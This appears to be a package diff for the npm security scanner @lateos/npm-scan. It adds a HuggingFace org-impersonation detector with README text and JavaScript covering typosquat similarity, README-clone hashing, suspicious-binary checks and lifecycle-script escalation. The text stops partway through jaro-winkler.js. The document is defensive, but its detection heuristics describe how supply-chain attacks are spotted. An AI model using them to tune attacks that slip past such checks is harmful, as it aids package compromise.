@lateos/npm-scan 0.15.2 → 0.15.4
- package/README.md +9 -2
- package/backend/detectors/hf-impersonation/index.js +396 -0
- package/backend/detectors/hf-impersonation/jaro-winkler.js +44 -0
- package/backend/detectors/hf-impersonation/known-orgs.js +5 -0
- package/backend/detectors/hf-impersonation/simhash.js +46 -0
- package/backend/detectors/index.js +4 -0
- package/backend/detectors/mini-shai-hulud/d1-burst-publish.js +42 -0
- package/backend/detectors/mini-shai-hulud/d2-sibling-compromise.js +116 -0
- package/backend/detectors/mini-shai-hulud/d3-slsa-mismatch.js +72 -0
- package/backend/detectors/mini-shai-hulud/d4-maintainer-anomaly.js +45 -0
- package/backend/detectors/mini-shai-hulud/d5-ioc-check.js +95 -0
- package/backend/detectors/mini-shai-hulud/d6-token-exfil.js +38 -0
- package/backend/detectors/mini-shai-hulud/index.js +80 -0
- package/backend/detectors/mini-shai-hulud/iocs.json +47 -0
- package/package.json +1 -1
package/README.md
CHANGED
|
@@ -3,7 +3,7 @@
|
|
|
3
3
|
[](https://www.npmjs.com/package/@lateos/npm-scan)
|
|
4
4
|
[](LICENSING.md)
|
|
5
5
|
[](package.json)
|
|
6
|
-
[](https://github.com/lateos-ai/npm-scan)
|
|
7
7
|
[](https://github.com/lateos-ai/npm-scan)
|
|
8
8
|
[](https://hub.docker.com/r/lateos/npm-scan)
|
|
9
9
|
[](https://github.com/lateos-ai/npm-scan/actions/workflows/publish.yml)
|
|
@@ -24,6 +24,8 @@ The 2025–2026 wave of npm supply chain attacks proved that traditional tooling
|
|
|
24
24
|
|
|
25
25
|
Attackers have moved past simple typosquatting. They now ship **obfuscated preinstall hooks**, **credential harvesters hidden behind environment detection**, **dormant backdoors with time-based activation**, and **worm-style transitive propagation** that spreads through peer dependencies.
|
|
26
26
|
|
|
27
|
+
A growing attack vector is **HuggingFace org impersonation**: packages that masquerade as legitimate HF model repositories (e.g., `0penai/gpt2` instead of `openai/gpt2`) to trick users into downloading malicious model artifacts during CI/CD pipelines, often bundled with suspicious binaries (`.exe`, `.dll`) in model repos that deep-learning tools trust by default.
|
|
28
|
+
|
|
27
29
|
The **Megalodon campaign** (2026) alone compromised 5,500+ repositories via fake GitHub PRs, malicious workflow injection, and cloud credential exfiltration — all coordinated through a single actor automating the entire kill chain. **@lateos/npm-scan** now detects artifacts of this campaign out of the box.
|
|
28
30
|
|
|
29
31
|
**npm audit** checks known CVEs. **Snyk** scans for vulnerabilities. **Socket** looks at package behavior. None of them were designed for the generation of attacks that emerged in 2025 — attacks that look benign until they reach production.
|
|
@@ -45,6 +47,7 @@ The **Megalodon campaign** (2026) alone compromised 5,500+ repositories via fake
|
|
|
45
47
|
| Sandbox evasion detection (ATK-010) | ❌ | ❌ | ❌ | ✅ |
|
|
46
48
|
| Transitive worm propagation (ATK-011) | ❌ | ❌ | ❌ | ✅ |
|
|
47
49
|
| Campaign detection (Megalodon CI/CD) | ❌ | ❌ | ❌ | ✅ |
|
|
50
|
+
| HF model repo impersonation + README clone | ❌ | ❌ | ❌ | ✅ |
|
|
48
51
|
| Attack taxonomy (ATK series) | ❌ | ❌ | ❌ | ✅ |
|
|
49
52
|
| SBOM output (CycloneDX + SPDX) | ❌ | ✅ | ❌ | ✅ |
|
|
50
53
|
| SARIF v2.1 (GitHub Code Scanning) | ❌ | ❌ | ❌ | ✅ |
|
|
@@ -74,6 +77,7 @@ The **Megalodon campaign** (2026) alone compromised 5,500+ repositories via fake
|
|
|
74
77
|
| 🛡️ | **Zero telemetry** | No data leaves your machine. No cloud. No callbacks. |
|
|
75
78
|
| 💾 | **Local scan history** | SQLite-backed persistence, zero external dependencies |
|
|
76
79
|
| 🪝 | **Pre-commit hook** | Block threats before commit — one-liner install, scans `package-lock.json` changes |
|
|
80
|
+
| 🤖 | **HF impersonation detection** | Detects typosquatted HuggingFace orgs (Jaro-Winkler), README clones (SimHash), artifact mismatches (`.exe` in model repos), and new-org amplifier — with lazy two-stage evaluation, zero network in Stage 1 |
|
|
77
81
|
| 📎 | **Yarn + pnpm support** | `scan-lockfile` parses `yarn.lock` and `pnpm-lock.yaml` alongside `package-lock.json` |
|
|
78
82
|
|
|
79
83
|
---
|
|
@@ -283,9 +287,11 @@ npm-scan report --pdf # all scans (premium)
|
|
|
283
287
|
| **ATK-010** | Sandbox evasion / anti-analysis | Behavioral | 🟠 medium | SR-10.3 |
|
|
284
288
|
| **ATK-011** | Transitive propagation (worm-style lateral spread) | Behavioral | 🔴 high | SR-11.4 |
|
|
285
289
|
| **MEGALODON** | Megalodon CI/CD campaign — workflow C2 exfil, credential harvest, publish velocity spike, publisher drift | Static + Registry | ⚫ critical | SR-3.1, SR-7.5 |
|
|
290
|
+
| **HF_IMPERSONATION** | HuggingFace org spoof detection — Jaro-Winkler similarity against 15 known-good orgs, SimHash README clone detection, artifact mismatch (`.exe`/`.dll` in model repos), postinstall escalation, new-org amplifier | Static + Network (Stage 2) | 🔴 high / ⚫ critical | SR-2.1 |
|
|
286
291
|
|
|
287
292
|
> **How evasive attacks are caught:** ATK-009 detects packages that check `process.env.CI`, probe hostnames, or use time-based activation. ATK-010 flags `debugger` statements, `os.hostname()` probes, and env fingerprinting. ATK-011 traces peer dependency graphs to detect worm-like propagation patterns.
|
|
288
293
|
> **MEGALODON** campaign detection analyzes bundled `.github/workflows/` files for C2 co-occurrence and base64 decode chains, scans tarball files for credential + outbound network patterns, detects version publish velocity spikes via npm registry metadata, and identifies publisher account drift — all without any network calls beyond the initial package fetch.
|
|
294
|
+
> **HF_IMPERSONATION** detection uses a lazy two-stage evaluation: Stage 1 scans `package.json` scripts and JS/TS sources for HuggingFace references (URLs, `from_pretrained()`, `hub.download()`) and runs Jaro-Winkler similarity against 15 known-good HF orgs — zero network. If spoofs are found, Stage 2 fetches the HF model API, computes SimHash of both READMEs for clone detection, validates artifact type consistency (e.g., `transformers` library with `.exe` files is flagged as critical), applies a new-org amplifier (<30 days), and escalates when the reference appears in a lifecycle script.
|
|
289
295
|
> See [`docs/attack-taxonomy.md`](docs/attack-taxonomy.md) for full evasion surface documentation and PoC examples.
|
|
290
296
|
|
|
291
297
|
---
|
|
@@ -632,7 +638,7 @@ See the [Docker quick-start section](#-run-lateosnpm-scan-anywhere-with-docker--
|
|
|
632
638
|
|
|
633
639
|
### Free tier (shipped)
|
|
634
640
|
|
|
635
|
-
- All 11 ATK detectors + **MEGALODON** CI/CD campaign detection (D1–D6)
|
|
641
|
+
- All 11 ATK detectors + **MEGALODON** CI/CD campaign detection (D1–D6) + **HF_IMPERSONATION** detector
|
|
636
642
|
- SBOM output (CycloneDX + SPDX)
|
|
637
643
|
- HTML, text, and compliance reports (NIST + EU CRA)
|
|
638
644
|
- Policy-as-code engine (YAML)
|
|
@@ -701,6 +707,7 @@ node --test test/detectors-corpus.test.js
|
|
|
701
707
|
- `test/report-snapshots.test.js` — HTML/text/CRA/PDF format assertions
|
|
702
708
|
- `test/report.test.js` — SARIF, CSV, STIG, risk score format tests
|
|
703
709
|
- `test/lockfile.test.js` — npm/yarn/pnpm parser, auto-detect, ATK-007/011 lockfile tests
|
|
710
|
+
- `test/hf-impersonation.test.js` — 13 HF impersonation detection tests (no-ref, exact match, spoof, README clone, artifact mismatch, postinstall escalation, new-org tag)
|
|
704
711
|
- `test/cli.test.js` — commander integration tests (help, version, scan, report, error handling)
|
|
705
712
|
- `test/cli-lockfile.test.js` — scan-lockfile CLI options, yarn/pnpm/monorepo/watch tests
|
|
706
713
|
|
|
@@ -0,0 +1,396 @@
|
|
|
1
|
+
import { KNOWN_HF_ORGS } from './known-orgs.js';
|
|
2
|
+
import { jaroWinkler } from './jaro-winkler.js';
|
|
3
|
+
import { simhash, similarity as simhashSimilarity } from './simhash.js';
|
|
4
|
+
|
|
5
|
+
const HF_URL_PATTERN = /(?:huggingface\.co|hf\.co)\/([^\/\s"'>]+)\/([^\/\s"'>]+)/g;
|
|
6
|
+
const FROM_PRETRAINED_PATTERN = /from_pretrained\(\s*["']([^"']+\/[^"']+)["']/g;
|
|
7
|
+
const HUB_DOWNLOAD_SINGLE = /hub\.download\(\s*["']([^"']+\/[^"']+)["']/g;
|
|
8
|
+
const HUB_DOWNLOAD_DOUBLE = /hub\.download\(\s*["']([^"']+)["']\s*,\s*["']([^"']+)["']/g;
|
|
9
|
+
|
|
10
|
+
const LIFECYCLE_SCRIPTS = new Set(['postinstall', 'prepare', 'install']);
|
|
11
|
+
const API_BASE = 'https://huggingface.co';
|
|
12
|
+
|
|
13
|
+
const SEVERITY_SCORE = { none: 0, low: 1, medium: 2, high: 3, critical: 4 };
|
|
14
|
+
const SEVERITY_LABELS = ['none', 'low', 'medium', 'high', 'critical'];
|
|
15
|
+
|
|
16
|
+
const HF_ARTIFACT_LIBS = new Set(['transformers', 'diffusers', 'sentence-transformers', 'gguf', 'safetensors']);
|
|
17
|
+
const SUSPICIOUS_EXTENSIONS = /\.(exe|msi|bat|ps1|dll)$/i;
|
|
18
|
+
|
|
19
|
+
const _cache = new Map();
|
|
20
|
+
const CACHE_TTL = 3600 * 1000;
|
|
21
|
+
let _lastFetchTime = 0;
|
|
22
|
+
|
|
23
|
+
function severityIndex(sev) {
|
|
24
|
+
return SEVERITY_SCORE[sev] || 0;
|
|
25
|
+
}
|
|
26
|
+
|
|
27
|
+
function maxSeverity(a, b) {
|
|
28
|
+
return severityIndex(a) >= severityIndex(b) ? a : b;
|
|
29
|
+
}
|
|
30
|
+
|
|
31
|
+
function sleep(ms) {
|
|
32
|
+
return new Promise(r => setTimeout(r, ms));
|
|
33
|
+
}
|
|
34
|
+
|
|
35
|
+
async function fetchWithCache(url) {
|
|
36
|
+
const cached = _cache.get(url);
|
|
37
|
+
if (cached && Date.now() - cached.fetchedAt < CACHE_TTL) {
|
|
38
|
+
return cached.data;
|
|
39
|
+
}
|
|
40
|
+
const now = Date.now();
|
|
41
|
+
const elapsed = now - _lastFetchTime;
|
|
42
|
+
if (elapsed < 100) {
|
|
43
|
+
await sleep(100 - elapsed);
|
|
44
|
+
}
|
|
45
|
+
_lastFetchTime = Date.now();
|
|
46
|
+
let res;
|
|
47
|
+
try {
|
|
48
|
+
res = await fetch(url);
|
|
49
|
+
if (res.status === 429) {
|
|
50
|
+
const retryAfter = parseInt(res.headers.get('Retry-After') || '5', 10);
|
|
51
|
+
await sleep(retryAfter * 1000);
|
|
52
|
+
res = await fetch(url);
|
|
53
|
+
}
|
|
54
|
+
if (!res.ok) {
|
|
55
|
+
console.debug(`HF API warning: ${url} returned ${res.status}`);
|
|
56
|
+
return null;
|
|
57
|
+
}
|
|
58
|
+
const data = await res.json();
|
|
59
|
+
_cache.set(url, { data, fetchedAt: Date.now() });
|
|
60
|
+
return data;
|
|
61
|
+
} catch (err) {
|
|
62
|
+
console.debug(`HF API warning: ${err.message}`);
|
|
63
|
+
return null;
|
|
64
|
+
}
|
|
65
|
+
}
|
|
66
|
+
|
|
67
|
+
async function fetchReadme(url) {
|
|
68
|
+
const cached = _cache.get(url);
|
|
69
|
+
if (cached && Date.now() - cached.fetchedAt < CACHE_TTL) {
|
|
70
|
+
return cached.data;
|
|
71
|
+
}
|
|
72
|
+
const now = Date.now();
|
|
73
|
+
const elapsed = now - _lastFetchTime;
|
|
74
|
+
if (elapsed < 100) {
|
|
75
|
+
await sleep(100 - elapsed);
|
|
76
|
+
}
|
|
77
|
+
_lastFetchTime = Date.now();
|
|
78
|
+
try {
|
|
79
|
+
const res = await fetch(url);
|
|
80
|
+
if (res.status === 429) {
|
|
81
|
+
const retryAfter = parseInt(res.headers.get('Retry-After') || '5', 10);
|
|
82
|
+
await sleep(retryAfter * 1000);
|
|
83
|
+
const retryRes = await fetch(url);
|
|
84
|
+
if (!retryRes.ok) return null;
|
|
85
|
+
const text = await retryRes.text();
|
|
86
|
+
_cache.set(url, { data: text, fetchedAt: Date.now() });
|
|
87
|
+
return text;
|
|
88
|
+
}
|
|
89
|
+
if (!res.ok) return null;
|
|
90
|
+
const text = await res.text();
|
|
91
|
+
_cache.set(url, { data: text, fetchedAt: Date.now() });
|
|
92
|
+
return text;
|
|
93
|
+
} catch (err) {
|
|
94
|
+
console.debug(`HF README warning: ${err.message}`);
|
|
95
|
+
return null;
|
|
96
|
+
}
|
|
97
|
+
}
|
|
98
|
+
|
|
99
|
+
function findClosestOrg(spoofedOrg) {
|
|
100
|
+
const lowerOrg = String(spoofedOrg).toLowerCase();
|
|
101
|
+
let best = { org: null, score: 0 };
|
|
102
|
+
for (const known of KNOWN_HF_ORGS) {
|
|
103
|
+
const score = jaroWinkler(lowerOrg, known.toLowerCase());
|
|
104
|
+
if (score >= 0.82 && score > best.score) {
|
|
105
|
+
best = { org: known, score };
|
|
106
|
+
}
|
|
107
|
+
}
|
|
108
|
+
return best;
|
|
109
|
+
}
|
|
110
|
+
|
|
111
|
+
function extractHFTuples(pkgJson, allFiles) {
|
|
112
|
+
const tuples = new Set();
|
|
113
|
+
let postinstallFetchFlag = false;
|
|
114
|
+
|
|
115
|
+
const scripts = pkgJson?.scripts || {};
|
|
116
|
+
let m;
|
|
117
|
+
for (const [hook, script] of Object.entries(scripts)) {
|
|
118
|
+
if (typeof script !== 'string') continue;
|
|
119
|
+
|
|
120
|
+
HF_URL_PATTERN.lastIndex = 0;
|
|
121
|
+
while ((m = HF_URL_PATTERN.exec(script)) !== null) {
|
|
122
|
+
tuples.add(`${m[1]}/${m[2]}`);
|
|
123
|
+
if (LIFECYCLE_SCRIPTS.has(hook)) {
|
|
124
|
+
postinstallFetchFlag = true;
|
|
125
|
+
}
|
|
126
|
+
}
|
|
127
|
+
|
|
128
|
+
FROM_PRETRAINED_PATTERN.lastIndex = 0;
|
|
129
|
+
while ((m = FROM_PRETRAINED_PATTERN.exec(script)) !== null) {
|
|
130
|
+
tuples.add(m[1]);
|
|
131
|
+
if (LIFECYCLE_SCRIPTS.has(hook)) {
|
|
132
|
+
postinstallFetchFlag = true;
|
|
133
|
+
}
|
|
134
|
+
}
|
|
135
|
+
|
|
136
|
+
HUB_DOWNLOAD_SINGLE.lastIndex = 0;
|
|
137
|
+
while ((m = HUB_DOWNLOAD_SINGLE.exec(script)) !== null) {
|
|
138
|
+
tuples.add(m[1]);
|
|
139
|
+
if (LIFECYCLE_SCRIPTS.has(hook)) {
|
|
140
|
+
postinstallFetchFlag = true;
|
|
141
|
+
}
|
|
142
|
+
}
|
|
143
|
+
|
|
144
|
+
HUB_DOWNLOAD_DOUBLE.lastIndex = 0;
|
|
145
|
+
while ((m = HUB_DOWNLOAD_DOUBLE.exec(script)) !== null) {
|
|
146
|
+
tuples.add(`${m[1]}/${m[2]}`);
|
|
147
|
+
if (LIFECYCLE_SCRIPTS.has(hook)) {
|
|
148
|
+
postinstallFetchFlag = true;
|
|
149
|
+
}
|
|
150
|
+
}
|
|
151
|
+
}
|
|
152
|
+
|
|
153
|
+
if (allFiles) {
|
|
154
|
+
for (const file of allFiles) {
|
|
155
|
+
if (!file.path?.match(/\.(js|ts|jsx|tsx|mjs|cjs)$/i)) continue;
|
|
156
|
+
const content = typeof file.content === 'string' ? file.content : '';
|
|
157
|
+
|
|
158
|
+
HF_URL_PATTERN.lastIndex = 0;
|
|
159
|
+
while ((m = HF_URL_PATTERN.exec(content)) !== null) {
|
|
160
|
+
tuples.add(`${m[1]}/${m[2]}`);
|
|
161
|
+
}
|
|
162
|
+
|
|
163
|
+
FROM_PRETRAINED_PATTERN.lastIndex = 0;
|
|
164
|
+
while ((m = FROM_PRETRAINED_PATTERN.exec(content)) !== null) {
|
|
165
|
+
tuples.add(m[1]);
|
|
166
|
+
}
|
|
167
|
+
|
|
168
|
+
HUB_DOWNLOAD_SINGLE.lastIndex = 0;
|
|
169
|
+
while ((m = HUB_DOWNLOAD_SINGLE.exec(content)) !== null) {
|
|
170
|
+
tuples.add(m[1]);
|
|
171
|
+
}
|
|
172
|
+
|
|
173
|
+
HUB_DOWNLOAD_DOUBLE.lastIndex = 0;
|
|
174
|
+
while ((m = HUB_DOWNLOAD_DOUBLE.exec(content)) !== null) {
|
|
175
|
+
tuples.add(`${m[1]}/${m[2]}`);
|
|
176
|
+
}
|
|
177
|
+
}
|
|
178
|
+
}
|
|
179
|
+
|
|
180
|
+
return { tuples, postinstallFetchFlag };
|
|
181
|
+
}
|
|
182
|
+
|
|
183
|
+
function buildHFOrgSpoofFinding(referencedRepo, org, canonicalOrg, similarityScore, postinstallFetchFlag, tags, hfMeta) {
|
|
184
|
+
const finding = {
|
|
185
|
+
id: 'HF_ORG_SPOOF',
|
|
186
|
+
severity: 'high',
|
|
187
|
+
title: 'HuggingFace org impersonation',
|
|
188
|
+
description: `Repository "${referencedRepo}" references org "${org}" which is similar to known HF org "${canonicalOrg.org}" (similarity: ${similarityScore.toFixed(3)})`,
|
|
189
|
+
evidence: JSON.stringify({
|
|
190
|
+
referencedRepo,
|
|
191
|
+
canonicalOrg: canonicalOrg.org,
|
|
192
|
+
similarityScore,
|
|
193
|
+
tags: tags || [],
|
|
194
|
+
}),
|
|
195
|
+
referencedRepo,
|
|
196
|
+
canonicalOrg: canonicalOrg.org,
|
|
197
|
+
similarityScore,
|
|
198
|
+
tags: tags || [],
|
|
199
|
+
ipiClass: 'SUPPLY_CHAIN',
|
|
200
|
+
};
|
|
201
|
+
if (hfMeta) {
|
|
202
|
+
finding.hfMeta = hfMeta;
|
|
203
|
+
}
|
|
204
|
+
return finding;
|
|
205
|
+
}
|
|
206
|
+
|
|
207
|
+
async function runStage2(spoofFindings, orgsToCheck, postinstallFetchFlag) {
|
|
208
|
+
const newFindings = [];
|
|
209
|
+
|
|
210
|
+
for (const [referencedRepo, { org, canonicalOrg, similarityScore, finding }] of orgsToCheck) {
|
|
211
|
+
const tags = [];
|
|
212
|
+
let hfMeta = null;
|
|
213
|
+
|
|
214
|
+
const modelUrl = `${API_BASE}/api/models/${referencedRepo}`;
|
|
215
|
+
const canonicalUrl = canonicalOrg.org !== org ? `${API_BASE}/api/models/${canonicalOrg.org}/${referencedRepo.split('/')[1]}` : null;
|
|
216
|
+
const userUrl = `${API_BASE}/api/users/${org}`;
|
|
217
|
+
|
|
218
|
+
const spoofedModel = await fetchWithCache(modelUrl);
|
|
219
|
+
const canonicalModel = canonicalUrl ? await fetchWithCache(canonicalUrl) : null;
|
|
220
|
+
const userData = await fetchWithCache(userUrl);
|
|
221
|
+
|
|
222
|
+
// Org age check for NEW_ORG tag
|
|
223
|
+
if (userData?.dateCreated) {
|
|
224
|
+
const created = new Date(userData.dateCreated);
|
|
225
|
+
const ageDays = (Date.now() - created.getTime()) / (1000 * 60 * 60 * 24);
|
|
226
|
+
hfMeta = {
|
|
227
|
+
orgAgeDays: Math.round(ageDays),
|
|
228
|
+
repoDownloads: spoofedModel?.downloads ?? 0,
|
|
229
|
+
};
|
|
230
|
+
if (ageDays < 30) {
|
|
231
|
+
tags.push('NEW_ORG');
|
|
232
|
+
}
|
|
233
|
+
}
|
|
234
|
+
|
|
235
|
+
// README clone check
|
|
236
|
+
if (canonicalOrg.org !== org) {
|
|
237
|
+
const readmeSpoof = await fetchReadme(`${API_BASE}/${referencedRepo}/resolve/main/README.md`);
|
|
238
|
+
const readmeCanonical = await fetchReadme(`${API_BASE}/${canonicalOrg.org}/${referencedRepo.split('/')[1]}/resolve/main/README.md`);
|
|
239
|
+
|
|
240
|
+
if (readmeSpoof && readmeCanonical) {
|
|
241
|
+
const fp1 = simhash(readmeSpoof);
|
|
242
|
+
const fp2 = simhash(readmeCanonical);
|
|
243
|
+
const simScore = simhashSimilarity(fp1, fp2);
|
|
244
|
+
|
|
245
|
+
if (simScore >= 0.9) {
|
|
246
|
+
const readmeFinding = {
|
|
247
|
+
id: 'HF_README_CLONE',
|
|
248
|
+
severity: 'high',
|
|
249
|
+
title: 'HuggingFace README clone',
|
|
250
|
+
description: `README of "${referencedRepo}" is highly similar (${(simScore * 100).toFixed(1)}%) to canonical org "${canonicalOrg.org}/${referencedRepo.split('/')[1]}"`,
|
|
251
|
+
evidence: JSON.stringify({
|
|
252
|
+
referencedRepo,
|
|
253
|
+
canonicalOrg: canonicalOrg.org,
|
|
254
|
+
similarityScore: simScore,
|
|
255
|
+
tags: [],
|
|
256
|
+
}),
|
|
257
|
+
referencedRepo,
|
|
258
|
+
canonicalOrg: canonicalOrg.org,
|
|
259
|
+
similarityScore: simScore,
|
|
260
|
+
tags: [],
|
|
261
|
+
ipiClass: 'SUPPLY_CHAIN',
|
|
262
|
+
};
|
|
263
|
+
if (hfMeta) readmeFinding.hfMeta = hfMeta;
|
|
264
|
+
newFindings.push(readmeFinding);
|
|
265
|
+
}
|
|
266
|
+
}
|
|
267
|
+
}
|
|
268
|
+
|
|
269
|
+
// Artifact mismatch check
|
|
270
|
+
if (spoofedModel?.cardData?.library_name && spoofedModel?.siblings) {
|
|
271
|
+
const libName = spoofedModel.cardData.library_name;
|
|
272
|
+
if (HF_ARTIFACT_LIBS.has(libName)) {
|
|
273
|
+
for (const sibling of spoofedModel.siblings) {
|
|
274
|
+
const fn = sibling.rfilename || '';
|
|
275
|
+
if (SUSPICIOUS_EXTENSIONS.test(fn)) {
|
|
276
|
+
const artifactFinding = {
|
|
277
|
+
id: 'HF_ARTIFACT_MISMATCH',
|
|
278
|
+
severity: 'critical',
|
|
279
|
+
title: 'HF artifact mismatch — suspicious binary in model repo',
|
|
280
|
+
description: `Model "${referencedRepo}" declares library "${libName}" but contains suspicious file "${fn}"`,
|
|
281
|
+
evidence: JSON.stringify({
|
|
282
|
+
referencedRepo,
|
|
283
|
+
artifactConflict: { declaredType: libName, suspiciousFilename: fn },
|
|
284
|
+
tags: [],
|
|
285
|
+
}),
|
|
286
|
+
referencedRepo,
|
|
287
|
+
artifactConflict: { declaredType: libName, suspiciousFilename: fn },
|
|
288
|
+
tags: [],
|
|
289
|
+
ipiClass: 'SUPPLY_CHAIN',
|
|
290
|
+
};
|
|
291
|
+
if (hfMeta) artifactFinding.hfMeta = hfMeta;
|
|
292
|
+
newFindings.push(artifactFinding);
|
|
293
|
+
break;
|
|
294
|
+
}
|
|
295
|
+
}
|
|
296
|
+
}
|
|
297
|
+
}
|
|
298
|
+
|
|
299
|
+
// Apply NEW_ORG and POSTINSTALL_FETCH tags to all findings for this repo
|
|
300
|
+
const repoSpoofFindings = spoofFindings.filter(f => f.referencedRepo === referencedRepo);
|
|
301
|
+
for (const sf of repoSpoofFindings) {
|
|
302
|
+
if (tags.length > 0) {
|
|
303
|
+
if (!sf.tags) sf.tags = [];
|
|
304
|
+
for (const t of tags) {
|
|
305
|
+
if (!sf.tags.includes(t)) sf.tags.push(t);
|
|
306
|
+
}
|
|
307
|
+
}
|
|
308
|
+
if (hfMeta) {
|
|
309
|
+
sf.hfMeta = hfMeta;
|
|
310
|
+
}
|
|
311
|
+
}
|
|
312
|
+
for (const nf of newFindings) {
|
|
313
|
+
if (nf.referencedRepo === referencedRepo) {
|
|
314
|
+
if (tags.length > 0) {
|
|
315
|
+
if (!nf.tags) nf.tags = [];
|
|
316
|
+
for (const t of tags) {
|
|
317
|
+
if (!nf.tags.includes(t)) nf.tags.push(t);
|
|
318
|
+
}
|
|
319
|
+
}
|
|
320
|
+
}
|
|
321
|
+
}
|
|
322
|
+
}
|
|
323
|
+
|
|
324
|
+
// POSTINSTALL_FETCH escalation
|
|
325
|
+
if (postinstallFetchFlag) {
|
|
326
|
+
const allStage2Findings = [...spoofFindings, ...newFindings];
|
|
327
|
+
const escalatedRepos = new Set();
|
|
328
|
+
for (const f of allStage2Findings) {
|
|
329
|
+
if (f.referencedRepo) escalatedRepos.add(f.referencedRepo);
|
|
330
|
+
}
|
|
331
|
+
for (const f of allStage2Findings) {
|
|
332
|
+
if (escalatedRepos.has(f.referencedRepo)) {
|
|
333
|
+
if (severityIndex(f.severity) < severityIndex('critical')) {
|
|
334
|
+
f.severity = 'critical';
|
|
335
|
+
}
|
|
336
|
+
if (!f.tags) f.tags = [];
|
|
337
|
+
if (!f.tags.includes('POSTINSTALL_ESCALATED')) {
|
|
338
|
+
f.tags.push('POSTINSTALL_ESCALATED');
|
|
339
|
+
}
|
|
340
|
+
}
|
|
341
|
+
}
|
|
342
|
+
}
|
|
343
|
+
|
|
344
|
+
return newFindings;
|
|
345
|
+
}
|
|
346
|
+
|
|
347
|
+
export async function scan(pkgJson, files = [], registryMeta = null, allFiles = null) {
|
|
348
|
+
const { tuples, postinstallFetchFlag } = extractHFTuples(pkgJson, allFiles || files);
|
|
349
|
+
|
|
350
|
+
if (tuples.size === 0) return [];
|
|
351
|
+
|
|
352
|
+
// Stage 1: org spoof detection (local only)
|
|
353
|
+
const spoofFindings = [];
|
|
354
|
+
const orgsToCheck = []; // [referencedRepo, { org, canonicalOrg, similarityScore, finding }]
|
|
355
|
+
|
|
356
|
+
for (const tuple of tuples) {
|
|
357
|
+
const parts = tuple.split('/');
|
|
358
|
+
if (parts.length < 2) continue;
|
|
359
|
+
const org = parts[0];
|
|
360
|
+
|
|
361
|
+
const canonicalOrg = findClosestOrg(org);
|
|
362
|
+
if (!canonicalOrg.org) continue;
|
|
363
|
+
if (org.toLowerCase() === canonicalOrg.org.toLowerCase()) continue;
|
|
364
|
+
|
|
365
|
+
const finding = buildHFOrgSpoofFinding(tuple, org, canonicalOrg, canonicalOrg.score, postinstallFetchFlag, []);
|
|
366
|
+
spoofFindings.push(finding);
|
|
367
|
+
orgsToCheck.push([tuple, { org, canonicalOrg, similarityScore: canonicalOrg.score, finding }]);
|
|
368
|
+
}
|
|
369
|
+
|
|
370
|
+
if (spoofFindings.length === 0) return [];
|
|
371
|
+
|
|
372
|
+
// Stage 2: network checks
|
|
373
|
+
const stage2Findings = await runStage2(spoofFindings, orgsToCheck, postinstallFetchFlag);
|
|
374
|
+
|
|
375
|
+
// Sync each finding's final tag list into its serialized evidence JSON
|
|
376
|
+
for (const f of [...spoofFindings, ...stage2Findings]) {
|
|
377
|
+
if (f.tags && f.tags.length > 0) {
|
|
378
|
+
try {
|
|
379
|
+
const ev = JSON.parse(f.evidence);
|
|
380
|
+
ev.tags = [...f.tags];
|
|
381
|
+
f.evidence = JSON.stringify(ev);
|
|
382
|
+
} catch {
|
|
383
|
+
// evidence wasn't JSON, leave as-is
|
|
384
|
+
}
|
|
385
|
+
}
|
|
386
|
+
}
|
|
387
|
+
|
|
388
|
+
return [...spoofFindings, ...stage2Findings];
|
|
389
|
+
}
|
|
390
|
+
|
|
391
|
+
export function clearCache() {
|
|
392
|
+
_cache.clear();
|
|
393
|
+
_lastFetchTime = 0;
|
|
394
|
+
}
|
|
395
|
+
|
|
396
|
+
export { KNOWN_HF_ORGS, jaroWinkler, simhash, simhashSimilarity };
|
|
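The Stage 1 extraction in the hunk above (the 396-line file, which by line count appears to be `hf-impersonation/index.js`) can be exercised without any network access. The following is a minimal sketch that reuses two of the regexes from the hunk. `extractRepoRefs` is a hypothetical helper name and the sample strings are made up for illustration; neither comes from the package.

```javascript
// Regexes copied from the hunk above.
const HF_URL_PATTERN = /(?:huggingface\.co|hf\.co)\/([^\/\s"'>]+)\/([^\/\s"'>]+)/g;
const FROM_PRETRAINED_PATTERN = /from_pretrained\(\s*["']([^"']+\/[^"']+)["']/g;

// Hypothetical helper: collect unique "org/repo" references from one string.
function extractRepoRefs(text) {
  const refs = new Set();
  // matchAll iterates over a clone of the regex, so the shared lastIndex stays at 0.
  for (const m of text.matchAll(HF_URL_PATTERN)) refs.add(`${m[1]}/${m[2]}`);
  for (const m of text.matchAll(FROM_PRETRAINED_PATTERN)) refs.add(m[1]);
  return [...refs];
}

// Made-up inputs: a lifecycle script and a source line.
const sampleScript = 'curl -L https://huggingface.co/0penai/gpt2/resolve/main/model.bin -o m.bin';
const sampleSource = 'const model = await AutoModel.from_pretrained("openai/gpt2");';

console.log(extractRepoRefs(sampleScript)); // [ '0penai/gpt2' ]
console.log(extractRepoRefs(sampleSource)); // [ 'openai/gpt2' ]
```

Using `matchAll` here is a design choice of the sketch: it avoids the manual `lastIndex = 0` resets that the hunk needs for its `exec()` loops over shared global regexes.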
@@ -0,0 +1,44 @@
|
|
|
1
|
+
export function jaroWinkler(s1, s2) {
|
|
2
|
+
if (s1 === s2) return 1;
|
|
3
|
+
const len1 = s1.length, len2 = s2.length;
|
|
4
|
+
if (len1 === 0 || len2 === 0) return 0;
|
|
5
|
+
|
|
6
|
+
const matchDist = Math.floor(Math.max(len1, len2) / 2) - 1;
|
|
7
|
+
const matches1 = new Array(len1).fill(false);
|
|
8
|
+
const matches2 = new Array(len2).fill(false);
|
|
9
|
+
let matches = 0;
|
|
10
|
+
|
|
11
|
+
for (let i = 0; i < len1; i++) {
|
|
12
|
+
const start = Math.max(0, i - matchDist);
|
|
13
|
+
const end = Math.min(len2, i + matchDist + 1);
|
|
14
|
+
for (let j = start; j < end; j++) {
|
|
15
|
+
if (matches2[j]) continue;
|
|
16
|
+
if (s1[i] !== s2[j]) continue;
|
|
17
|
+
matches1[i] = true;
|
|
18
|
+
matches2[j] = true;
|
|
19
|
+
matches++;
|
|
20
|
+
break;
|
|
21
|
+
}
|
|
22
|
+
}
|
|
23
|
+
|
|
24
|
+
if (matches === 0) return 0;
|
|
25
|
+
|
|
26
|
+
let transpositions = 0, k = 0;
|
|
27
|
+
for (let i = 0; i < len1; i++) {
|
|
28
|
+
if (!matches1[i]) continue;
|
|
29
|
+
while (!matches2[k]) k++;
|
|
30
|
+
if (s1[i] !== s2[k]) transpositions++;
|
|
31
|
+
k++;
|
|
32
|
+
}
|
|
33
|
+
|
|
34
|
+
const jaro = (matches / len1 + matches / len2 + (matches - transpositions / 2) / matches) / 3;
|
|
35
|
+
|
|
36
|
+
let prefix = 0;
|
|
37
|
+
